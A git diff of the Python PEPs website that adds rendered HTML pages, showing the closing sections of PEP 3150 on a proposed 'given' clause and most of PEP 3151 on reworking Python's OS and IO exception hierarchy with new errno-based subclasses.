  • parent classes, metaclass and optionally other details (depending on +the metaclass) for class definitions
  • +
+

This PEP proposes to make a similar declarative style available for +arbitrary assignment operations, by permitting the inclusion of a +“given” suite following any simple assignment statement:

+
TARGET = [TARGET2 = ... TARGETN =] EXPR given:
+    SUITE
+
+
+

By convention, code in the body of the suite should be oriented solely +towards correctly defining the assignment operation carried out in the +header line. The header line operation should also be adequately +descriptive (e.g. through appropriate choices of variable names) to +give a reader a reasonable idea of the purpose of the operation +without reading the body of the suite.

+

However, while they are the initial motivating use case, limiting this +feature solely to simple assignments would be overly restrictive. Once the +feature is defined at all, it would be quite arbitrary to prevent its use +for augmented assignments, return statements, yield expressions, +comprehensions and arbitrary expressions that may modify the +application state.

+

The given clause may also function as a more readable +alternative to some uses of lambda expressions and similar +constructs when passing one-off functions to operations +like sorted() or in callback based event-driven programming.

+

In module and class level code, the given clause will serve as a +clear and reliable replacement for usage of the del statement to keep +interim working variables from polluting the resulting namespace.

+

One potentially useful way to think of the proposed clause is as a middle +ground between conventional in-line code and separation of an +operation out into a dedicated function, just as an inline while loop may +eventually be factored out into a dedicated generator.

+
+
+

Design Discussion

+
+

Keyword Choice

+

This proposal initially used where based on the name of a similar +construct in Haskell. However, it has been pointed out that there +are existing Python libraries (such as Numpy [4]) that already use +where in the SQL query condition sense, making that keyword choice +potentially confusing.

+

While given may also be used as a variable name (and hence would be +deprecated using the usual __future__ dance for introducing +new keywords), it is associated much more strongly with the desired +“here are some extra variables this expression may use” semantics +for the new clause.

+

Reusing the with keyword has also been proposed. This has the +advantage of avoiding the addition of a new keyword, but also has +a high potential for confusion as the with clause and with +statement would look similar but do completely different things. +That way lies C++ and Perl :)

+
+
+

Relation to PEP 403

+

PEP 403 (General Purpose Decorator Clause) attempts to achieve the main +goals of this PEP using a less radical language change inspired by the +existing decorator syntax.

+

Despite having the same author, the two PEPs are in direct competition with +each other. PEP 403 represents a minimalist approach that attempts to achieve +useful functionality with a minimum of change from the status quo. This PEP +instead aims for a more flexible standalone statement design, which requires +a larger degree of change to the language.

+

Note that where PEP 403 is better suited to explaining the behaviour of +generator expressions correctly, this PEP is better able to explain the +behaviour of decorator clauses in general. Both PEPs support adequate +explanations for the semantics of container comprehensions.

+
+
+

Explaining Container Comprehensions and Generator Expressions

+

One interesting feature of the proposed construct is that it can be used as +a primitive to explain the scoping and execution order semantics of +container comprehensions:

+
seq2 = [x for x in y if q(x) for y in seq if p(y)]
+
+# would be equivalent to
+
+seq2 = ?.result given seq=seq:
+    result = []
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    result.append(x)
+
+
+

The important point in this expansion is that it explains why comprehensions +appear to misbehave at class scope: only the outermost iterator is evaluated +at class scope, while all predicates, nested iterators and value expressions +are evaluated inside a nested scope.

+

Not that, unlike PEP 403, the current version of this PEP cannot +provide a precisely equivalent expansion for a generator expression. The +closest it can get is to define an additional level of scoping:

+
seq2 = ?.g(seq) given:
+    def g(seq):
+        for y in seq:
+            if p(y):
+                for x in y:
+                    if q(x):
+                        yield x
+
+
+

This limitation could be remedied by permitting the given clause to be +a generator function, in which case ? would refer to a generator-iterator +object rather than a simple namespace:

+
seq2 = ? given seq=seq in:
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    yield x
+
+
+

However, this would make the meaning of “?” quite ambiguous, even more so +than is already the case for the meaning of def statements (which will +usually have a docstring indicating whether or not a function definition is +actually a generator)

+
+
+

Explaining Decorator Clause Evaluation and Application

+

The standard explanation of decorator clause evaluation and application +has to deal with the idea of hidden compiler variables in order to show +steps in their order of execution. The given statement allows a decorated +function definition like:

+
@classmethod
+def classname(cls):
+    return cls.__name__
+
+
+

To instead be explained as roughly equivalent to:

+
classname = .d1(classname) given:
+    d1 = classmethod
+    def classname(cls):
+        return cls.__name__
+
+
+
+
+

Anticipated Objections

+
+

Two Ways To Do It

+

A lot of code may now be written with values defined either before the +expression where they are used or afterwards in a given clause, creating +two ways to do it, perhaps without an obvious way of choosing between them.

+

On reflection, I feel this is a misapplication of the “one obvious way” +aphorism. Python already offers lots of ways to write code. We can use +a for loop or a while loop, a functional style or an imperative style or an +object oriented style. The language, in general, is designed to let people +write code that matches the way they think. Since different people think +differently, the way they write their code will change accordingly.

+

Such stylistic questions in a code base are rightly left to the development +group responsible for that code. When does an expression get so complicated +that the subexpressions should be taken out and assigned to variables, even +though those variables are only going to be used once? When should an inline +while loop be replaced with a generator that implements the same logic? +Opinions differ, and that’s OK.

+

However, explicit PEP 8 guidance will be needed for CPython and the standard +library, and that is discussed in the proposal above.

+
+
+

Out of Order Execution

+

The given clause makes execution jump around a little strangely, as the +body of the given clause is executed before the simple statement in the +clause header. The closest any other part of Python comes to this is the out +of order evaluation in list comprehensions, generator expressions and +conditional expressions and the delayed application of decorator functions to +the function they decorate (the decorator expressions themselves are executed +in the order they are written).

+

While this is true, the syntax is intended for cases where people are +themselves thinking about a problem out of sequence (at least as far as +the language is concerned). As an example of this, consider the following +thought in the mind of a Python user:

+
+
I want to sort the items in this sequence according to the values of +attr1 and attr2 on each item.
+

If they’re comfortable with Python’s lambda expressions, then they might +choose to write it like this:

+
sorted_list = sorted(original, key=(lambda v: v.attr1, v.attr2))
+
+
+

That gets the job done, but it hardly reaches the standard of executable +pseudocode that fits Python’s reputation.

+

If they don’t like lambda specifically, the operator module offers an +alternative that still allows the key function to be defined inline:

+
sorted_list = sorted(original,
+                     key=operator.attrgetter(v. 'attr1', 'attr2'))
+
+
+

Again, it gets the job done, but even the most generous of readers would +not consider that to be “executable pseudocode”.

+

If they think both of the above options are ugly and confusing, or they need +logic in their key function that can’t be expressed as an expression (such +as catching an exception), then Python currently forces them to reverse the +order of their original thought and define the sorting criteria first:

+
def sort_key(item):
+    return item.attr1, item.attr2
+
+sorted_list = sorted(original, key=sort_key)
+
+
+

“Just define a function” has been the rote response to requests for multi-line +lambda support for years. As with the above options, it gets the job done, +but it really does represent a break between what the user is thinking and +what the language allows them to express.

+

I believe the proposal in this PEP would finally let Python get close to the +“executable pseudocode” bar for the kind of thought expressed above:

+
sorted_list = sorted(original, key=?.key) given:
+    def key(item):
+        return item.attr1, item.attr2
+
+
+

Everything is in the same order as it was in the user’s original thought, and +they don’t even need to come up with a name for the sorting criteria: it is +possible to reuse the keyword argument name directly.

+

A possible enhancement to those proposal would be to provide a convenient +shorthand syntax to say “use the given clause contents as keyword +arguments”. Even without dedicated syntax, that can be written simply as +**vars(?).

+
+
+

Harmful to Introspection

+

Poking around in module and class internals is an invaluable tool for +white-box testing and interactive debugging. The given clause will be +quite effective at preventing access to temporary state used during +calculations (although no more so than current usage of del statements +in that regard).

+

While this is a valid concern, design for testability is an issue that +cuts across many aspects of programming. If a component needs to be tested +independently, then a given statement should be refactored in to separate +statements so that information is exposed to the test suite. This isn’t +significantly different from refactoring an operation hidden inside a +function or generator out into its own function purely to allow it to be +tested in isolation.

+
+
+

Lack of Real World Impact Assessment

+

The examples in the current PEP are almost all relatively small “toy” +examples. The proposal in this PEP needs to be subjected to the test of +application to a large code base (such as the standard library or a large +Twisted application) in a search for examples where the readability of real +world code is genuinely enhanced.

+

This is more of a deficiency in the PEP rather than the idea, though. If +it wasn’t a real world problem, we wouldn’t get so many complaints about +the lack of multi-line lambda support and Ruby’s block construct +probably wouldn’t be quite so popular.

+
+
+
+
+

Open Questions

+
+

Syntax for Forward References

+

The ? symbol is proposed for forward references to the given namespace +as it is short, currently unused and suggests “there’s something missing +here that will be filled in later”.

+

The proposal in the PEP doesn’t neatly parallel any existing Python feature, +so reusing an already used symbol has been deliberately avoided.

+
+
+

Handling of nonlocal and global

+

nonlocal and global are explicitly disallowed in the given clause +suite and will be syntax errors if they occur. They will work normally if +they appear within a def statement within that suite.

+

Alternatively, they could be defined as operating as if the anonymous +functions were defined as in the expansion above.

+
+
+

Handling of break and continue

+

break and continue will operate as if the anonymous functions were +defined as in the expansion above. They will be syntax errors if they occur +in the given clause suite but will work normally if they appear within +a for or while loop as part of that suite.

+
+
+

Handling of return and yield

+

return and yield are explicitly disallowed in the given clause +suite and will be syntax errors if they occur. They will work normally if +they appear within a def statement within that suite.

+
+
+
+

Examples

+

Defining callbacks for event driven programming:

+
# Current Python (definition before use)
+def cb(sock):
+    # Do something with socket
+def eb(exc):
+    logging.exception(
+        "Failed connecting to %s:%s", host, port)
+loop.create_connection((host, port), cb, eb) given:
+
+# Becomes:
+loop.create_connection((host, port), ?.cb, ?.eb) given:
+    def cb(sock):
+        # Do something with socket
+    def eb(exc):
+        logging.exception(
+            "Failed connecting to %s:%s", host, port)
+
+
+

Defining “one-off” classes which typically only have a single instance:

+
# Current Python (instantiation after definition)
+class public_name():
+  ... # However many lines
+public_name = public_name(*params)
+
+# Current Python (custom decorator)
+def singleton(*args, **kwds):
+    def decorator(cls):
+        return cls(*args, **kwds)
+    return decorator
+
+@singleton(*params)
+class public_name():
+  ... # However many lines
+
+# Becomes:
+public_name = ?.MeaningfulClassName(*params) given:
+  class MeaningfulClassName():
+    ... # Should trawl the stdlib for an example of doing this
+
+
+

Calculating attributes without polluting the local namespace (from os.py):

+
# Current Python (manual namespace cleanup)
+def _createenviron():
+  ... # 27 line function
+
+environ = _createenviron()
+del _createenviron
+
+# Becomes:
+environ = ?._createenviron() given:
+    def _createenviron():
+      ... # 27 line function
+
+
+

Replacing default argument hack (from functools.lru_cache):

+
# Current Python (default argument hack)
+def decorating_function(user_function,
+               tuple=tuple, sorted=sorted, len=len, KeyError=KeyError):
+  ... # 60 line function
+return decorating_function
+
+# Becomes:
+return ?.decorating_function given:
+  # Cell variables rather than locals, but should give similar speedup
+  tuple, sorted, len, KeyError = tuple, sorted, len, KeyError
+  def decorating_function(user_function):
+    ... # 60 line function
+
+# This example also nicely makes it clear that there is nothing in the
+# function after the nested function definition. Due to additional
+# nested functions, that isn't entirely clear in the current code.
+
+
+
+
+

Possible Additions

+
    +
  • The current proposal allows the addition of a given clause only +for simple statements. Extending the idea to allow the use of +compound statements would be quite possible (by appending the given +clause as an independent suite at the end), but doing so raises +serious readability concerns (as values defined in the given +clause may be used well before they are defined, exactly the kind +of readability trap that other features like decorators and with +statements are designed to eliminate)
  • +
  • The “explicit early binding” variant may be applicable to the discussions +on python-ideas on how to eliminate the default argument hack. A given +clause in the header line for functions (after the return type annotation) +may be the answer to that question.
  • +
+
+
+

Rejected Alternatives

+
    +
  • An earlier version of this PEP allowed implicit forward references to the +names in the trailing suite, and also used implicit early binding +semantics. Both of these ideas substantially complicated the proposal +without providing a sufficient increase in expressive power. The current +proposing with explicit forward references and early binding brings the +new construct into line with existing scoping semantics, greatly +improving the chances the idea can actually be implemented.
  • +
  • In addition to the proposals made here, there have also been suggestions +of two suite “in-order” variants which provide the limited scoping of +names without supporting out-of-order execution. I believe these +suggestions largely miss the point of what people are complaining about +when they ask for multi-line lambda support - it isn’t that coming up +with a name for the subexpression is especially difficult, it’s that +naming the function before the statement that uses it means the code +no longer matches the way the developer thinks about the problem at hand.
  • +
  • I’ve made some unpublished attempts to allow direct references to the +closure implicitly created by the given clause, while still retaining +the general structure of the syntax as defined in this PEP (For example, +allowing a subexpression like ?given or :given to be used in +expressions to indicate a direct reference to the implied closure, thus +preventing it from being called automatically to create the local namespace). +All such attempts have appeared unattractive and confusing compared to +the simpler decorator-inspired proposal in PEP 403.
  • +
+
+
+

Reference Implementation

+

None as yet. If you want a crash course in Python namespace +semantics and code compilation, feel free to try ;)

+
+
+

TO-DO

+
    +
  • Mention PEP 359 and possible uses for locals() in the given clause
  • +
  • Figure out if this can be used internally to make the implementation of +zero-argument super() calls less awful
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3150.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3151/index.html b/pep-3151/index.html new file mode 100644 index 00000000000..af1e5fba977 --- /dev/null +++ b/pep-3151/index.html @@ -0,0 +1,1107 @@ + + + + + + + + PEP 3151 – Reworking the OS and IO exception hierarchy | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3151 – Reworking the OS and IO exception hierarchy

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Jul-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The standard exception hierarchy is an important part of the Python +language. It has two defining qualities: it is both generic and +selective. Generic in that the same exception type can be raised +- and handled - regardless of the context (for example, whether you are +trying to add something to an integer, to call a string method, or to write +an object on a socket, a TypeError will be raised for bad argument types). +Selective in that it allows the user to easily handle (silence, examine, +process, store or encapsulate…) specific kinds of error conditions +while letting other errors bubble up to higher calling contexts. For +example, you can choose to catch ZeroDivisionErrors without affecting +the default handling of other ArithmeticErrors (such as OverflowErrors).

+

This PEP proposes changes to a part of the exception hierarchy in +order to better embody the qualities mentioned above: the errors +related to operating system calls (OSError, IOError, mmap.error, +select.error, and all their subclasses).

+
+
+

Rationale

+ +
+

Lack of fine-grained exceptions

+

The current variety of OS-related exceptions doesn’t allow the user to filter +easily for the desired kinds of failures. As an example, consider the task +of deleting a file if it exists. The Look Before You Leap (LBYL) idiom +suffers from an obvious race condition:

+
if os.path.exists(filename):
+    os.remove(filename)
+
+
+

If a file named as filename is created by another thread or process +between the calls to os.path.exists and os.remove, it won’t be +deleted. This can produce bugs in the application, or even security issues.

+

Therefore, the solution is to try to remove the file, and ignore the error +if the file doesn’t exist (an idiom known as Easier to Ask Forgiveness +than to get Permission, or EAFP). Careful code will read like the following +(which works under both POSIX and Windows systems):

+
try:
+    os.remove(filename)
+except OSError as e:
+    if e.errno != errno.ENOENT:
+        raise
+
+
+

or even:

+
try:
+    os.remove(filename)
+except EnvironmentError as e:
+    if e.errno != errno.ENOENT:
+        raise
+
+
+

This is a lot more to type, and also forces the user to remember the various +cryptic mnemonics from the errno module. It imposes an additional +cognitive burden and gets tiresome rather quickly. Consequently, many +programmers will instead write the following code, which silences exceptions +too broadly:

+
try:
+    os.remove(filename)
+except OSError:
+    pass
+
+
+

os.remove can raise an OSError not only when the file doesn’t exist, +but in other possible situations (for example, the filename points to a +directory, or the current process doesn’t have permission to remove +the file), which all indicate bugs in the application logic and therefore +shouldn’t be silenced. What the programmer would like to write instead is +something such as:

+
try:
+    os.remove(filename)
+except FileNotFoundError:
+    pass
+
+
+
+
+
+

Compatibility strategy

+

Reworking the exception hierarchy will obviously change the exact semantics +of at least some existing code. While it is not possible to improve on the +current situation without changing exact semantics, it is possible to define +a narrower type of compatibility, which we will call useful compatibility.

+

For this we first must explain what we will call careful and careless +exception handling. Careless (or “naïve”) code is defined as code which +blindly catches any of OSError, IOError, socket.error, +mmap.error, WindowsError, select.error without checking the errno +attribute. This is because such exception types are much too broad to signify +anything. Any of them can be raised for error conditions as diverse as: a +bad file descriptor (which will usually indicate a programming error), an +unconnected socket (ditto), a socket timeout, a file type mismatch, an invalid +argument, a transmission failure, insufficient permissions, a non-existent +directory, a full filesystem, etc.

+

(moreover, the use of certain of these exceptions is irregular; Appendix B exposes the case of the select module, +which raises different exceptions depending on the implementation)

+

Careful code is defined as code which, when catching any of the above +exceptions, examines the errno attribute to determine the actual error +condition and takes action depending on it.

+

Then we can define useful compatibility as follows:

+
    +
  • useful compatibility doesn’t make exception catching any narrower, but +it can be broader for careless exception-catching code. Given the following +kind of snippet, all exceptions caught before this PEP will also be +caught after this PEP, but the reverse may be false (because the coalescing +of OSError, IOError and others means the except clause throws +a slightly broader net):
    try:
    +    ...
    +    os.remove(filename)
    +    ...
    +except OSError:
    +    pass
    +
    +
    +
  • +
  • useful compatibility doesn’t alter the behaviour of careful +exception-catching code. Given the following kind of snippet, the same +errors should be silenced or re-raised, regardless of whether this PEP +has been implemented or not:
    try:
    +    os.remove(filename)
    +except OSError as e:
    +    if e.errno != errno.ENOENT:
    +        raise
    +
    +
    +
  • +
+

The rationale for this compromise is that careless code can’t really be +helped, but at least code which “works” won’t suddenly raise errors and +crash. This is important since such code is likely to be present in +scripts used as cron tasks or automated system administration programs.

+

Careful code, on the other hand, should not be penalized. Actually, one +purpose of this PEP is to ease writing careful code.

+
+
+

Step 1: coalesce exception types

+

The first step of the resolution is to coalesce existing exception types. +The following changes are proposed:

+
    +
  • alias both socket.error and select.error to OSError
  • +
  • alias mmap.error to OSError
  • +
  • alias both WindowsError and VMSError to OSError
  • +
  • alias IOError to OSError
  • +
  • coalesce EnvironmentError into OSError
  • +
+

Each of these changes doesn’t preserve exact compatibility, but it does +preserve useful compatibility (see “compatibility” section above).

+

Each of these changes can be accepted or refused individually, but of course +it is considered that the greatest impact can be achieved if this first step +is accepted in full. In this case, the IO exception sub-hierarchy would +become:

+
+-- OSError   (replacing IOError, WindowsError, EnvironmentError, etc.)
+    +-- io.BlockingIOError
+    +-- io.UnsupportedOperation (also inherits from ValueError)
+    +-- socket.gaierror
+    +-- socket.herror
+    +-- socket.timeout
+
+
+
+

Justification

+

Not only does this first step present the user a simpler landscape as +explained in the rationale section, but it also allows for a better +and more complete resolution of Step 2 (see Prerequisite).

+

The rationale for keeping OSError as the official name for generic +OS-related exceptions is that it, precisely, is more generic than IOError. +EnvironmentError is more tedious to type and also much lesser-known.

+

The survey in Appendix B shows that IOError is the +dominant error today in the standard library. As for third-party Python code, +Google Code Search shows IOError being ten times more popular than +EnvironmentError in user code, and three times more popular than OSError +[3]. However, with no intention to deprecate IOError in the middle +term, the lesser popularity of OSError is not a problem.

+
+
+

Exception attributes

+

Since WindowsError is coalesced into OSError, the latter gains a winerror +attribute under Windows. It is set to None under situations where it is not +meaningful, as is already the case with the errno, filename and +strerror attributes (for example when OSError is raised directly by +Python code).

+
+
+

Deprecation of names

+

The following paragraphs outline a possible deprecation strategy for +old exception names. However, it has been decided to keep them as aliases +for the time being. This decision could be revised in time for Python 4.0.

+
+

built-in exceptions

+

Deprecating the old built-in exceptions cannot be done in a straightforward +fashion by intercepting all lookups in the builtins namespace, since these +are performance-critical. We also cannot work at the object level, since +the deprecated names will be aliased to non-deprecated objects.

+

A solution is to recognize these names at compilation time, and +then emit a separate LOAD_OLD_GLOBAL opcode instead of the regular +LOAD_GLOBAL. This specialized opcode will handle the output of a +DeprecationWarning (or PendingDeprecationWarning, depending on the policy +decided upon) when the name doesn’t exist in the globals namespace, but +only in the builtins one. This will be enough to avoid false positives +(for example if someone defines their own OSError in a module), and +false negatives will be rare (for example when someone accesses OSError +through the builtins module rather than directly).

+
+
+

module-level exceptions

+

The above approach cannot be used easily, since it would require +special-casing some modules when compiling code objects. However, these +names are by construction much less visible (they don’t appear in the +builtins namespace), and lesser-known too, so we might decide to let them +live in their own namespaces.

+
+
+
+
+

Step 2: define additional subclasses

+

The second step of the resolution is to extend the hierarchy by defining +subclasses which will be raised, rather than their parent, for specific +errno values. Which errno values is subject to discussion, but a survey +of existing exception matching practices (see Appendix A) helps us propose a reasonable subset of all values. +Trying to map all errno mnemonics, indeed, seems foolish, pointless, +and would pollute the root namespace.

+

Furthermore, in a couple of cases, different errno values could raise +the same exception subclass. For example, EAGAIN, EALREADY, EWOULDBLOCK +and EINPROGRESS are all used to signal that an operation on a non-blocking +socket would block (and therefore needs trying again later). They could +therefore all raise an identical subclass and let the user examine the +errno attribute if (s)he so desires (see below “exception +attributes”).

+
+

Prerequisite

+

Step 1 is a loose prerequisite for this.

+

Prerequisite, because some errnos can currently be attached to different +exception classes: for example, ENOENT can be attached to both OSError and +IOError, depending on the context. If we don’t want to break useful +compatibility, we can’t make an except OSError (or IOError) fail to +match an exception where it would succeed today.

+

Loose, because we could decide for a partial resolution of step 2 +if existing exception classes are not coalesced: for example, ENOENT could +raise a hypothetical FileNotFoundError where an IOError was previously +raised, but continue to raise OSError otherwise.

+

The dependency on step 1 could be totally removed if the new subclasses +used multiple inheritance to match with all of the existing superclasses +(or, at least, OSError and IOError, which are arguable the most prevalent +ones). It would, however, make the hierarchy more complicated and +therefore harder to grasp for the user.

+
+
+

New exception classes

+

The following tentative list of subclasses, along with a description and +the list of errnos mapped to them, is submitted to discussion:

+
    +
  • FileExistsError: trying to create a file or directory which already +exists (EEXIST)
  • +
  • FileNotFoundError: for all circumstances where a file and directory is +requested but doesn’t exist (ENOENT)
  • +
  • IsADirectoryError: file-level operation (open(), os.remove()…) +requested on a directory (EISDIR)
  • +
  • NotADirectoryError: directory-level operation requested on something +else (ENOTDIR)
  • +
  • PermissionError: trying to run an operation without the adequate access +rights - for example filesystem permissions (EACCES, EPERM)
  • +
  • BlockingIOError: an operation would block on an object (e.g. socket) set +for non-blocking operation (EAGAIN, EALREADY, EWOULDBLOCK, EINPROGRESS); +this is the existing io.BlockingIOError with an extended role
  • +
  • BrokenPipeError: trying to write on a pipe while the other end has been +closed, or trying to write on a socket which has been shutdown for writing +(EPIPE, ESHUTDOWN)
  • +
  • InterruptedError: a system call was interrupted by an incoming signal +(EINTR)
  • +
  • ConnectionAbortedError: connection attempt aborted by peer (ECONNABORTED)
  • +
  • ConnectionRefusedError: connection reset by peer (ECONNREFUSED)
  • +
  • ConnectionResetError: connection reset by peer (ECONNRESET)
  • +
  • TimeoutError: connection timed out (ETIMEDOUT); this can be re-cast +as a generic timeout exception, replacing socket.timeout and also useful +for other types of timeout (for example in Lock.acquire())
  • +
  • ChildProcessError: operation on a child process failed (ECHILD); +this is raised mainly by the wait() family of functions.
  • +
  • ProcessLookupError: the given process (as identified by, e.g., its +process id) doesn’t exist (ESRCH).
  • +
+

In addition, the following exception class is proposed for inclusion:

+
    +
  • ConnectionError: a base class for ConnectionAbortedError, +ConnectionRefusedError and ConnectionResetError
  • +
+

The following drawing tries to sum up the proposed additions, along with +the corresponding errno values (where applicable). The root of the +sub-hierarchy (OSError, assuming Step 1 is accepted in full) is not +shown:

+
+-- BlockingIOError        EAGAIN, EALREADY, EWOULDBLOCK, EINPROGRESS
++-- ChildProcessError                                          ECHILD
++-- ConnectionError
+    +-- BrokenPipeError                              EPIPE, ESHUTDOWN
+    +-- ConnectionAbortedError                           ECONNABORTED
+    +-- ConnectionRefusedError                           ECONNREFUSED
+    +-- ConnectionResetError                               ECONNRESET
++-- FileExistsError                                            EEXIST
++-- FileNotFoundError                                          ENOENT
++-- InterruptedError                                            EINTR
++-- IsADirectoryError                                          EISDIR
++-- NotADirectoryError                                        ENOTDIR
++-- PermissionError                                     EACCES, EPERM
++-- ProcessLookupError                                          ESRCH
++-- TimeoutError                                            ETIMEDOUT
+
+
+
+
+

Naming

+

Various naming controversies can arise. One of them is whether all +exception class names should end in “Error”. In favour is consistency +with the rest of the exception hierarchy, against is concision (especially +with long names such as ConnectionAbortedError).

+
+
+

Exception attributes

+

In order to preserve useful compatibility, these subclasses should still +set adequate values for the various exception attributes defined on the +superclass (for example errno, filename, and optionally +winerror).

+
+
+

Implementation

+

Since it is proposed that the subclasses are raised based purely on the +value of errno, little or no changes should be required in extension +modules (either standard or third-party).

+

The first possibility is to adapt the PyErr_SetFromErrno() family +of functions (PyErr_SetFromWindowsErr() under Windows) to raise the +appropriate OSError subclass. This wouldn’t cover, however, Python +code raising OSError directly, using the following idiom (seen in +Lib/tempfile.py):

+
raise IOError(_errno.EEXIST, "No usable temporary file name found")
+
+
+

A second possibility, suggested by Marc-Andre Lemburg, is to adapt +OSError.__new__ to instantiate the appropriate subclass. This has +the benefit of also covering Python code such as the above.

+
+
+
+

Possible objections

+
+

Namespace pollution

+

Making the exception hierarchy finer-grained makes the root (or builtins) +namespace larger. This is to be moderated, however, as:

+
    +
  • only a handful of additional classes are proposed;
  • +
  • while standard exception types live in the root namespace, they are +visually distinguished by the fact that they use the CamelCase convention, +while almost all other builtins use lowercase naming (except True, False, +None, Ellipsis and NotImplemented)
  • +
+

An alternative would be to provide a separate module containing the +finer-grained exceptions, but that would defeat the purpose of +encouraging careful code over careless code, since the user would first +have to import the new module instead of using names already accessible.

+
+
+
+

Earlier discussion

+

While this is the first time such as formal proposal is made, the idea +has received informal support in the past [1]; both the introduction +of finer-grained exception classes and the coalescing of OSError and +IOError.

+

The removal of WindowsError alone has been discussed and rejected +as part of another PEP, +but there seemed to be a consensus that the +distinction with OSError wasn’t meaningful. This supports at least its +aliasing with OSError.

+
+
+

Implementation

+

The reference implementation has been integrated into Python 3.3. +It was formerly developed in http://hg.python.org/features/pep-3151/ in +branch pep-3151, and also tracked on the bug tracker at +http://bugs.python.org/issue12555. +It has been successfully tested on a variety of systems: Linux, Windows, +OpenIndiana and FreeBSD buildbots.

+

One source of trouble has been with the respective constructors of OSError +and WindowsError, which were incompatible. The way it is solved is by +keeping the OSError signature and adding a fourth optional argument +to allow passing the Windows error code (which is different from the POSIX +errno). The fourth argument is stored as winerror and its POSIX +translation as errno. The PyErr_SetFromWindowsErr* functions have +been adapted to use the right constructor call.

+

A slight complication is when the PyErr_SetExcFromWindowsErr* functions +are called with OSError rather than WindowsError: the errno +attribute of the exception object would store the Windows error code (such +as 109 for ERROR_BROKEN_PIPE) rather than its POSIX translation (such as 32 +for EPIPE), which it does now. For non-socket error codes, this only occurs +in the private _multiprocessing module for which there is no compatibility +concern.

+
+

Note

+

For socket errors, the “POSIX errno” as reflected by the errno module +is numerically equal to the Windows Socket error code +returned by the WSAGetLastError system call:

+
>>> errno.EWOULDBLOCK
+10035
+>>> errno.WSAEWOULDBLOCK
+10035
+
+
+
+
+
+

Possible alternative

+
+

Pattern matching

+

Another possibility would be to introduce an advanced pattern matching +syntax when catching exceptions. For example:

+
try:
+    os.remove(filename)
+except OSError as e if e.errno == errno.ENOENT:
+    pass
+
+
+

Several problems with this proposal:

+
    +
  • it introduces new syntax, which is perceived by the author to be a heavier +change compared to reworking the exception hierarchy
  • +
  • it doesn’t decrease typing effort significantly
  • +
  • it doesn’t relieve the programmer from the burden of having to remember +errno mnemonics
  • +
+
+
+
+

Exceptions ignored by this PEP

+

This PEP ignores EOFError, which signals a truncated input stream in +various protocol and file format implementations (for example GzipFile). +EOFError is not OS- or IO-related, it is a logical error raised at +a higher level.

+

This PEP also ignores SSLError, which is raised by the ssl module +in order to propagate errors signalled by the OpenSSL library. Ideally, +SSLError would benefit from a similar but separate treatment since it +defines its own constants for error types (ssl.SSL_ERROR_WANT_READ, +etc.). In Python 3.2, SSLError is already replaced with socket.timeout +when it signals a socket timeout (see issue 10272).

+

Endly, the fate of socket.gaierror and socket.herror is not settled. +While they would deserve less cryptic names, this can be handled separately +from the exception hierarchy reorganization effort.

+
+
+

Appendix A: Survey of common errnos

+

This is a quick inventory of the various errno mnemonics checked for in +the standard library and its tests, as part of except clauses.

+
+

Common errnos with OSError

+
    +
  • EBADF: bad file descriptor (usually means the file descriptor was +closed)
  • +
  • EEXIST: file or directory exists
  • +
  • EINTR: interrupted function call
  • +
  • EISDIR: is a directory
  • +
  • ENOTDIR: not a directory
  • +
  • ENOENT: no such file or directory
  • +
  • EOPNOTSUPP: operation not supported on socket +(possible confusion with the existing io.UnsupportedOperation)
  • +
  • EPERM: operation not permitted (when using e.g. os.setuid())
  • +
+
+
+

Common errnos with IOError

+
    +
  • EACCES: permission denied (for filesystem operations)
  • +
  • EBADF: bad file descriptor (with select.epoll); read operation on a +write-only GzipFile, or vice-versa
  • +
  • EBUSY: device or resource busy
  • +
  • EISDIR: is a directory (when trying to open())
  • +
  • ENODEV: no such device
  • +
  • ENOENT: no such file or directory (when trying to open())
  • +
  • ETIMEDOUT: connection timed out
  • +
+
+
+

Common errnos with socket.error

+

All these errors may also be associated with a plain IOError, for example +when calling read() on a socket’s file descriptor.

+
    +
  • EAGAIN: resource temporarily unavailable (during a non-blocking socket +call except connect())
  • +
  • EALREADY: connection already in progress (during a non-blocking +connect())
  • +
  • EINPROGRESS: operation in progress (during a non-blocking connect())
  • +
  • EINTR: interrupted function call
  • +
  • EISCONN: the socket is connected
  • +
  • ECONNABORTED: connection aborted by peer (during an accept() call)
  • +
  • ECONNREFUSED: connection refused by peer
  • +
  • ECONNRESET: connection reset by peer
  • +
  • ENOTCONN: socket not connected
  • +
  • ESHUTDOWN: cannot send after transport endpoint shutdown
  • +
  • EWOULDBLOCK: same reasons as EAGAIN
  • +
+
+
+

Common errnos with select.error

+
    +
  • EINTR: interrupted function call
  • +
+
+
+
+

Appendix B: Survey of raised OS and IO errors

+
+

About VMSError

+

VMSError is completely unused by the interpreter core and the standard +library. It was added as part of the OpenVMS patches submitted in 2002 +by Jean-François Piéronne [4]; the motivation for including VMSError was that +it could be raised by third-party packages.

+
+
+

Interpreter core

+

Handling of PYTHONSTARTUP raises IOError (but the error gets discarded):

+
$ PYTHONSTARTUP=foox ./python
+Python 3.2a0 (py3k:82920M, Jul 16 2010, 22:53:23)
+[GCC 4.4.3] on linux2
+Type "help", "copyright", "credits" or "license" for more information.
+Could not open PYTHONSTARTUP
+IOError: [Errno 2] No such file or directory: 'foox'
+
+
+

PyObject_Print() raises IOError when ferror() signals an error on the +FILE * parameter (which, in the source tree, is always either stdout or +stderr).

+

Unicode encoding and decoding using the mbcs encoding can raise +WindowsError for some error conditions.

+
+
+

Standard library

+
+

bz2

+

Raises IOError throughout (OSError is unused):

+
>>> bz2.BZ2File("foox", "rb")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> bz2.BZ2File("LICENSE", "rb").read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: invalid data stream
